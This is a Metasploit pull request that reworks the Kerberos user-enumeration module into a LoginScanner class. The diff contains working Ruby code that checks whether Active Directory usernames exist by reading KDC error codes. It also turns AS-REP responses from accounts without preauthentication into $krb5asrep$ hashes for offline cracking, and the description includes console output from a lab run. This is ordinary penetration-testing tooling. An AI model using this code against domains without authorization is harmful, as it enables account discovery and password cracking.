### PR TITLE
Use LoginScanner for Kerberos Enum Users

### DIFF
--- a/lib/metasploit/framework/login_scanner/kerberos.rb
+++ b/lib/metasploit/framework/login_scanner/kerberos.rb
@@ -1,0 +1,93 @@
+require 'metasploit/framework/login_scanner/base'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Kerberos User scanner
+      class Kerberos
+        include Metasploit::Framework::LoginScanner::Base
+        include Msf::Exploit::Remote::Kerberos::Client
+
+        DEFAULT_PORT = 88
+
+        def attempt_login(credential)
+          request_options = {
+            credential: credential,
+            host: self.host,
+            port: self.port,
+            protocol: 'tcp',
+            service_name: 'kerberos'
+          }
+
+          begin
+            res = send_request_as(request_options.merge({
+              timeout: self.timeout,
+              client_name: credential.to_h[:username],
+              server_name: self.server_name,
+              realm: self.realm,
+              pa_data: self.pa_data
+            }))
+          rescue ::EOFError => e
+            elog(e)
+            # Stop further requests entirely
+            res_opts = request_options.merge({ status: :eof, proof: e })
+            return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+          rescue Rex::Proto::Kerberos::Model::Error::KerberosDecodingError => e
+            elog(e)
+            # Stop further requests entirely
+            res_opts = request_options.merge({ status: :decode_error, proof: e })
+            return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+          end
+
+          case res.msg_type
+          when Rex::Proto::Kerberos::Model::AS_REP
+            hash = format_asrep_to_john_hash(res)
+
+            # Accounts that have 'Do not require Kerberos preauthentication' enabled, will receive an ASREP response with a ticket present
+            res_opts = request_options.merge({ status: :no_preauth, hash: hash, proof: res.msg_type })
+            return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+          when Rex::Proto::Kerberos::Model::KRB_ERROR
+            if res.error_code == Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_PREAUTH_REQUIRED
+              res_opts = request_options.merge({ status: :present, proof: res.msg_type })
+              return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+            elsif res.error_code == Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_CLIENT_REVOKED
+              res_opts = request_options.merge({ status: :disabled_or_locked_out, proof: res.msg_type })
+              return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+            elsif res.error_code == Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_C_PRINCIPAL_UNKNOWN
+              res_opts = request_options.merge({ status: :not_found, proof: res.msg_type })
+              return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+            elsif res.error_code == Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_WRONG_REALM
+              # Stop further requests entirely
+              res_opts = request_options.merge({ status: :wrong_realm, proof: res.msg_type })
+              return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+            else
+              res_opts = request_options.merge({ status: :unknown_error, proof: res.error_code })
+              return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+            end
+          else
+            res_opts = request_options.merge({ status: :unknown_response, proof: { error_code: res.error_code, response: res.msg_type.inspect } })
+            return Metasploit::Framework::LoginScanner::Result.new(res_opts)
+          end
+        end
+
+        def scan!
+          cred_details.each do |credential|
+            result = attempt_login(credential)
+            result.freeze
+
+            yield result if block_given?
+          end
+        end
+
+        attr_accessor :server_name, :realm, :pa_data, :datastore
+
+        private
+
+        def set_sane_defaults
+          self.port = DEFAULT_PORT unless self.port
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/kerberos/client/as_response.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/as_response.rb
@@ -40,6 +40,12 @@ module Msf
 
               auth_time.to_i
             end
+
+            # @param [Rex::Proto::Kerberos::Model::KdcResponse] asrep The krb5 asrep response
+            # @return [String] A valid string format which can be cracked offline
+            def format_asrep_to_john_hash(asrep)
+              "$krb5asrep$#{asrep.enc_part.etype}$#{asrep.cname.name_string.join('/')}@#{asrep.ticket.realm}:#{asrep.enc_part.cipher[0...16].unpack1('H*')}$#{asrep.enc_part.cipher[16..].unpack1('H*')}"
+            end
           end
         end
       end


### PR DESCRIPTION
This PR changes the Kerberos userenum module to use a LoginScanner mixin.

## Verification

- [ ] Start `msfconsole -q`
- [ ] `use auxiliary/gather/kerberos_enumusers`
- [ ] `set` the necessary values and usernames to check
- [ ] **Verify** that running the module against a Windows Server results in the correct users being shown as present

## Example output
Verbose:
```
msf6 auxiliary(gather/kerberos_enumusers) > set verbose true
verbose => true
msf6 auxiliary(gather/kerberos_enumusers) > options

Module options (auxiliary/gather/kerberos_enumusers):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DOMAIN            adf.local        yes       The Domain Eg: demo.local
   RHOSTS            192.168.129.175  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             88               yes       The target port
   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   Timeout           10               yes       The TCP timeout to establish connection and read data
   USERNAME                           no        A specific username to authenticate as
   USER_FILE         ./myusers.txt    no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(gather/kerberos_enumusers) > run

[*] Using domain: ADF.LOCAL - 192.168.129.175:88   ...
[+] 192.168.129.175 - User: sjanusz is present
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberos_enumusers) > set stop_on_success false
stop_on_success => false
msf6 auxiliary(gather/kerberos_enumusers) > run

[*] Using domain: ADF.LOCAL - 192.168.129.175:88   ...
[+] 192.168.129.175 - User: sjanusz is present
[!] No active DB -- Credential data will not be saved!
[*] 192.168.129.175 - User: admin user not found
[+] 192.168.129.175 - User: administrator is present
[*] 192.168.129.175 - User: defaultuser user not found
[+] 192.168.129.175 - User: normaluser is present
[+] 192.168.129.175 - User: testaccount is present
[*] 192.168.129.175 - User: idontexist user not found
[*] 192.168.129.175 - User: another_sample_account user not found
[*] Auxiliary module execution completed
```

Not verbose:
```
msf6 auxiliary(gather/kerberos_enumusers) > options

Module options (auxiliary/gather/kerberos_enumusers):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DOMAIN            adf.local        yes       The Domain Eg: demo.local
   RHOSTS            192.168.129.175  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             88               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   Timeout           10               yes       The TCP timeout to establish connection and read data
   USERNAME                           no        A specific username to authenticate as
   USER_FILE         ./myusers.txt    no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(gather/kerberos_enumusers) > set verbose false
verbose => false
msf6 auxiliary(gather/kerberos_enumusers) > run

[*] Using domain: ADF.LOCAL - 192.168.129.175:88   ...
[+] 192.168.129.175 - User: sjanusz is present
[+] 192.168.129.175 - User: administrator is present
[+] 192.168.129.175 - User: normaluser is present
[+] 192.168.129.175 - User: testaccount is present
[*] Auxiliary module execution completed
msf6 auxiliary(gather/kerberos_enumusers) > set stop_on_success true
stop_on_success => true
msf6 auxiliary(gather/kerberos_enumusers) > run

[*] Using domain: ADF.LOCAL - 192.168.129.175:88   ...
[+] 192.168.129.175 - User: sjanusz is present
[*] Auxiliary module execution completed
```